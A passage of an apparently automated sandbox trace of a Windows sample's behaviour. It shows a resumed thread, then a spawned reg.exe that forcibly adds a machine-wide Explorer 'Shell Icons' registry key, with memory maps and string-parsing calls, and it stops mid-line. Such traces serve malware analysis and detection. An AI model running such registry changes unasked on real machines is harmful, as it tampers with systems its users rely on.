[189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0116.657] ResumeThread (hThread=0x48) returned 0x1 [0116.657] CloseHandle (hObject=0x48) returned 1 [0116.657] CloseHandle (hObject=0x4c) returned 1 [0116.657] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0116.658] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0116.658] ExitProcess (uExitCode=0x0) Process: id = "53" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x7ea166c0" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xd8c" cmd_line = "reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8103 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8104 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8105 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8106 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8107 start_va = 0xab0000 end_va = 0xb01fff entry_point = 0xab0000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 8108 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8109 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8110 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8111 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 8112 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8217 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8218 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8219 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8220 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8221 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 8222 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8223 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8224 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8225 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8226 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8227 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8228 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8229 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8230 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8231 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8232 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8233 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8234 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8235 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8246 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 8247 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8248 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8249 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 8250 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8251 start_va = 0x2f0000 end_va = 0x2f8fff entry_point = 0x2f0000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 8252 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8253 start_va = 0x320000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 8254 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 8255 start_va = 0xb10000 end_va = 0x170ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 8256 start_va = 0x440000 end_va = 0x70efff entry_point = 0x440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8264 start_va = 0x710000 end_va = 0x7cffff entry_point = 0x710000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 84 os_tid = 0xe20 [0116.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afcbc | out: lpSystemTimeAsFileTime=0x1afcbc*(dwLowDateTime=0x82acdae0, dwHighDateTime=0x1d440a9)) [0116.377] GetCurrentProcessId () returned 0xe1c [0116.377] GetCurrentThreadId () returned 0xe20 [0116.377] GetTickCount () returned 0x279a1 [0116.377] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcb4 | out: lpPerformanceCount=0x1afcb4*=17316651353) returned 1 [0116.378] GetModuleHandleA (lpModuleName=0x0) returned 0xab0000 [0116.378] __set_app_type (_Type=0x1) [0116.378] __p__fmode () returned 0x76b331f4 [0116.378] __p__commode () returned 0x76b331fc [0116.378] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xabd4f9) returned 0x0 [0116.378] __wgetmainargs (in: _Argc=0xabf030, _Argv=0xabf038, _Env=0xabf034, _DoWildCard=0, _StartInfo=0xabf010 | out: _Argc=0xabf030, _Argv=0xabf038, _Env=0xabf034) returned 0 [0116.379] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0116.379] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.380] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x1afc3c | out: phkResult=0x1afc3c*=0x0) returned 0x2 [0116.380] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.380] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0116.380] lstrlenW (lpString="") returned 0 [0116.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.381] _memicmp (_Buf1=0x7e108, _Buf2=0xab1318, _Size=0x7) returned 0 [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] _memicmp (_Buf1=0x7e120, _Buf2=0xab1318, _Size=0x7) returned 0 [0116.381] _vsnwprintf (in: _Buffer=0x80e68, _BufferCount=0xe, _Format="|%s|", _ArgList=0x1afb58 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0116.381] _vsnwprintf (in: _Buffer=0x81fa8, _BufferCount=0x46, _Format="|%s|", _ArgList=0x1afb58 | out: _Buffer="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.381] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0116.381] lstrlenW (lpString="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.381] SetLastError (dwErrCode=0x490) [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0116.383] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.383] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0116.383] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] StrChrIW (lpStart="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.398] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Explorer\\Shell Icons", wMatch=0x5c) returned="\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Shell Icons", wMatch=0x5c) returned 0x0 [0116.399] SetLastError (dwErrCode=0x490) [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] SetLastError (dwErrCode=0x0) [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0116.400] SetLastError (dwErrCode=0x0) [0116.400] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x1afbec, lpdwDisposition=0x1afbc4 | out: phkResult=0x1afbec*=0x50, lpdwDisposition=0x1afbc4*=0x1) returned 0x0 [0116.400] RegQueryValueExW (in: hKey=0x50, lpValueName="", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0116.400] lstrlenW (lpString="") returned 0 [0116.400] RegSetValueExW (in: hKey=0x50, lpValueName="", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0116.400] RegCloseKey (hKey=0x50) returned 0x0 [0116.401] SetLastError (dwErrCode=0x0) [0116.401] GetLastError () returned 0x0 [0116.401] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1afb98, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x2040\x08\xfba4\x1a\x3176\xab\xfc60\x1a\x3753\xab") returned 0x27 [0116.401] GetLastError () returned 0x0 [0116.401] lstrlenW (lpString="The operation completed 